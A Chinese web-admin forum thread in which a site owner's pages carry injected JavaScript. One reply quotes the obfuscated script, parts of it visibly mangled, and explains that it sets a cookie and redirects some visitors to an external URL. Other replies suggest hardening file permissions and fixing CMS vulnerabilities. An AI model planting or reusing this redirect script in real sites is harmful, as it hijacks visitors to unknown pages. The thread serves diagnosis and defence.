qq1225475749
发表于 2022-10-8 16:38
linguo2625469
发表于 2022-10-8 17:37
本帖最后由 linguo2625469 于 2022-10-8 17:39 编辑
转码后看代码是调用了 _0x5c33e8 方法 里面判断时间跳转到某网址 你不发网站看不出js在哪注入的
var _0x56fa = ['MTIz', 'Y29va2ll', 'd2FmX3NjPTU4ODk2NDc3MjY=', 'dG9HTVRTdHJpbmc=', 'Z2V0VGltZQ==', 'cmFuZG9t', 'c2V0VGltZQ==', 'd2FmX3NjPTU4ODk2NDc3MjY7ZXhwaXJlcz0=', 'Zmxvb3I=', 'b2tr'];
(function(_0x5cdc87, _0x56fad8) {
var _0x17ee4e = function(_0x3ab03f) {
while (--_0x3ab03f) {
_0x5cdc87['push'](_0x5cdc87['shift']());
}
};
_0x17ee4e(++_0x56fad8);
}(_0x56fa, 0x1ea));
var _0x17ee = function(_0x5cdc87, _0x56fad8) {
_0x5cdc87 = _0x5cdc87 - 0x0;
var _0x17ee4e = _0x56fa;
if (_0x17ee['YXsPlG'] === undefined) {
(function() {
var _0x22447a = function() {
var _0x4511a3;
try {
_0x4511a3 = Function('return (function() ' + '{}.constructor("return this")( )' + ');')();
} catch (_0x5159fc) {
_0x4511a3 = window;
}
return _0x4511a3;
};
var _0x5936e3 = _0x22447a();
var _0x4f56f4 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';
_0x5936e3['atob'] || (_0x5936e3['atob'] = function(_0x47d2ae) {
var _0x125bc2 = String(_0x47d2ae)['replace'](/=+$/, '');
var _0x362eab = '';
for (var _0x974ba7 = 0x0, _0xba4511, _0x1df374, _0x36613c = 0x0; _0x1df374 = _0x125bc2['charAt'](_0x36613c++); ~_0x1df374 && (_0xba4511 = _0x974ba7 % 0x4 ? _0xba4511 * 0x40 + _0x1df374 : _0x1df374, _0x974ba7++ % 0x4) ? _0x362eab += String['fromCharCode'](0xff & _0xba4511 >> (-0x2 * _0x974ba7 & 0x6)) : 0x0) {
_0x1df374 = _0x4f56f4['indexOf'](_0x1df374);
}
return _0x362eab;
});
}());
_0x17ee['axhXWH'] = function(_0x564e5f) {
var _0x54055a = atob(_0x564e5f);
var _0x536fcc = [];
for (var _0x5c33e8 = 0x0, _0x5cfa34 = _0x54055a['length']; _0x5c33e8 < _0x5cfa34; _0x5c33e8++) {
_0x536fcc += '%' + ('00' + _0x54055a['charCodeAt'](_0x5c33e8)['toString'](0x10))['slice'](-0x2);
}
return decodeURIComponent(_0x536fcc);
};
_0x17ee['icwrRe'] = {};
_0x17ee['YXsPlG'] = !![];
}
var _0x3ab03f = _0x17ee['icwrRe'];
if (_0x3ab03f === undefined) {
_0x17ee4e = _0x17ee['axhXWH'](_0x17ee4e);
_0x17ee['icwrRe'] = _0x17ee4e;
} else {
_0x17ee4e = _0x3ab03f;
}
return _0x17ee4e;
};
function _0x5c33e8() {
var _0x5cfa34 = new Date();
_0x5cfa34(_0x5cfa34() + 0x18 * 0x3 * 0x3c * 0x3c * 0x3e8);
var _0x15e420 = document['cookie']['indexOf'](_0x17ee('0x2'));
if (_0x15e420 < 0x0 && document['okk'] == null) {
document = _0x17ee('0x0');
var _0x4b52a9 = Math(Math() * 0x64) + 0x1;
document = _0x17ee('0x7') + _0x5cfa34();
if (_0x4b52a9 <= 0xf) {
window['location']['href'] = 'https://xxxx.com/11098.html?channelCode=11098';
}
}
}
_0x5c33e8();
sbwfnhn
发表于 2022-10-9 08:49
修改漏是洞方法之一,还有就是修改文件读写权限,静态html与js代码,只读,想注入都难,还要防止http服务器被提权。
注入漏洞这个BUG,永远也改不完,改权限,放开最低权限,提高注入难度。
dblkings
发表于 2022-10-8 19:03
改成商用,然后报案,收拾他
601541027
发表于 2022-10-8 17:28
应该是你网站有漏洞吧
feichu
发表于 2022-10-8 18:00
{:1_905:}装个iis安全狗 护你周全
开创者
发表于 2022-10-8 18:08
程序可能有漏洞,先查杀再安装安全软件
李小天
发表于 2022-10-8 18:39
用的什么程序建站?
bdtl
发表于 2022-10-8 19:11
可以提供免费安全检测
liduowu
发表于 2022-10-8 19:17
我以前也中过一次,是织梦的内核,后来直接把网站更换了就解决了,要不然没完没了的改来改去
于生
发表于 2022-10-8 19:27
学习了,我刚开始接触建站,要向前辈们学习呀